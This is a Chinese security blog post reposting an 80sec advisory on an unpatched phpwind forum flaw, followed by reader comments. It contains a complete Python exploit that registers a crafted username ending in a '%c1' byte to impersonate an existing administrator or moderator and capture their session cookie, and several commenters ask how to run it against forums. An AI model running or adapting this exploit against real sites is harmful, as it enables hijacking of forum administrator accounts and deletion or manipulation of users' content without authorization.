phpwind管理权限泄露漏洞+利用程序

鬼仔:利用程序是Python写的。

漏洞发布:http://www.80sec.com/
漏洞作者:[email protected]
漏洞厂商: http://www.phpwind.com/ 本漏洞影响phpwind所有版本
漏洞危害:高
漏洞说明:phpwind是国内使用非常广泛的一款程序,由于在程序设计上存在错误,导致任何人可以取得前台管理员及斑主权限,做删除帖子等任意操作

利用方式:http://www.80sec.com有提供exploit
漏洞分析:由于phpwind论坛在设计上对数据库存储机制不了解,导致在程序逻辑上判断有问题,用精心构造的数据注册用户即可获得管理权限
漏洞修补:建议关闭注册功能等待官方出补丁
漏洞状态:
08.5.25发现此漏洞
08.6.1由80sec.com公开此漏洞

暂无补丁

原始地址:http://www.80sec.com/release/phpwind-exploit.txt

漏洞测试:

# -*- coding: gb2312 -*- 
import urllib2,httplib,sys 
httplib.HTTPConnection.debuglevel = 1 
cookies = urllib2.HTTPCookieProcessor() 
opener = urllib2.build_opener(cookies) 
  
  
def banner(): 
    print "" 
    print "########################################################" 
    print "Phpwind所有版本管理权限泄露漏洞利用poc" 
    print "Copyright (C) 2006" 
    print "[email protected]" 
    print "80sec是一个新的致力于web安全的小团体" 
    print "http://www.80sec.com" 
  
def usage(): 
    banner() 
    print "Usage:\n" 
    print "   $ ./phpwind.py pwforumurl usertoattack\n" 
    print "   pwforumurl    目标论坛地址如http://www.80sec.com/" 
    print "   usertoattack    目标拥有权限的斑竹或管理员" 
    print "   攻击结果将会在目标论坛注册一个和目标用户一样的帐户" 
    print "   最新版本可以使用uid登陆" 
    print "   其他版本可以使用cookie+useragent登陆" 
    print "########################################################" 
    print "" 
  
  
argvs=sys.argv 
usage() 
  
  
data = "regname=%s%s1®pwd=@80sec®pwdrepeat=@[email protected]®emailtoall=1&step=2" % (argvs[2],"%c1") 
pwurl = "%s/register.php" % argvs[1] 
  
request = urllib2.Request( 
    url     = pwurl , 
        headers = {'Content-Type' : 'application/x-www-form-urlencoded','User-Agent': '80sec owned this'}, 
        data    = data) 
  
f=opener.open(request) 
headers=f.headers.dict 
cookie=headers["set-cookie"] 
try: 
    if cookie.index('winduser'): 
        print "Exploit Success!" 
        print "Login with uid password @80sec or Cookie:" 
        print cookie 
        print "User-agent: 80sec owned this" 
except: 
    print "Error! http://www.80sec.com" 
    print "Connect root#80sec.com"

相关日志

楼被抢了 25 层了... 抢座Rss 2.0或者 Trackback

  • 一个人

    哈,php终于有大漏洞了。而且是所有版本的,3q鬼鬼

  • st285

    谁能吧这个编译出来才是见鬼了……
    牛淫们……麻烦代码写规范点…这个复制下去恐怕神也编译不了

  • 过路人

    汗哦..俺们是小菜鸟.这利用程序怎么搞都不知道..大大教教

  • ben

    见鬼,你刚发的日志就有近三百人的浏览量……

    这个漏洞可是严重至极,汗死,上次pw爆出这样严重的漏洞可是死了一大批,这次……眼看着discuz越来越牛叉,又爆出这样的漏洞,pw是压力大呀!

  • ben

    我发表的评论捏?

  • daidai

    确实哈….就不知道 usertoattack 填名字还是UID
    每次都跳到 Error! 麻烦鬼测试下哈…反正发包正常..测试几个没成功过一个

  • savior

    晕,这个是python写的,python是解释语言,虽说可以用py2exe编译,但是那也只不过是打包,只要装个PYTHON2.5就可以了,
    我也学PYTHON的,有空交流下!
    QQ594266388

  • savior

    这个程序写的菜啊,你开头那句还是不能解决问题,应该
    # -*- coding: utf-8 -*-
    这样中文问题就OK了

  • savior

    看完了,一个垃圾东西,忽悠人的,诶,

  • kid

    啊,看看,是PHPWIND嘛。
    没有学过这种语言——PYTHON

  • buhu

    怎么没看出是怎么利用漏洞的呢

  • aa

    就一假货

  • Cat9life

    如下错误提示.望哪位大牛提醒

    Traceback (most recent call last):
    File “C:\Python25\phpwind.py”, line 34, in
    data = “regname=%s%s1&regpwd=@80sec&regpwdrepeat=@80sec&[email protected]
    &regemailtoall=1&step=2″ % (argvs[2],”%c1”)
    IndexError: list index out of range

  • 魔兽秘籍

    不知道进入phpwind后台后应该怎么操作?

  • xiaoyang

    这个是不是真的?

  • R

    垃圾东西,谁要是能用这个拿到管理权限真见鬼了。
    那破代码无非是在用户名后加个%C11而已,真能忽悠。

  • yuehei

    这个漏洞可以使用,楼上几位真的让人很无语,不得不回个帖
    可能python会的人不多,我重写成PHP,可以看看http://yuehei.37net.com/show-15-1.html

  • blackhumor

    有没有谁把利用程序编绎成现成工具?

  • ff

    谁能分析下原理吗?

    为什么admin%c11的密码可以登录admin?

  • ff

    看了yuehei的分析明白了,谢谢

  • est

    Query Error: SELECT COUNT(*) AS count FROM pw_members WHERE username=’plan?’

    The URL Is:
    http://bbs.stuhome.net/register.php?method=full

    MySQL Server Error:
    Illegal mix of collations (utf8_general_ci,IMPLICIT) and (gbk_chinese_ci,COERCIBLE) for operation ‘=’ ( 1267 )

    You Can Get Help In:
    http://www.phpwind.net

    怎么办呢

  • swat

    还是不会用,有详细地说明吗?

  • 小傻仔

    怎么不做个教程啊?..
    这样能让人家更清楚点啊?

  • nbaaa

    编译不通过· 对于没学过python的人,是不是挺茫然的·
    急切盼望 出一个视频教程! 谢谢!!!

发表评论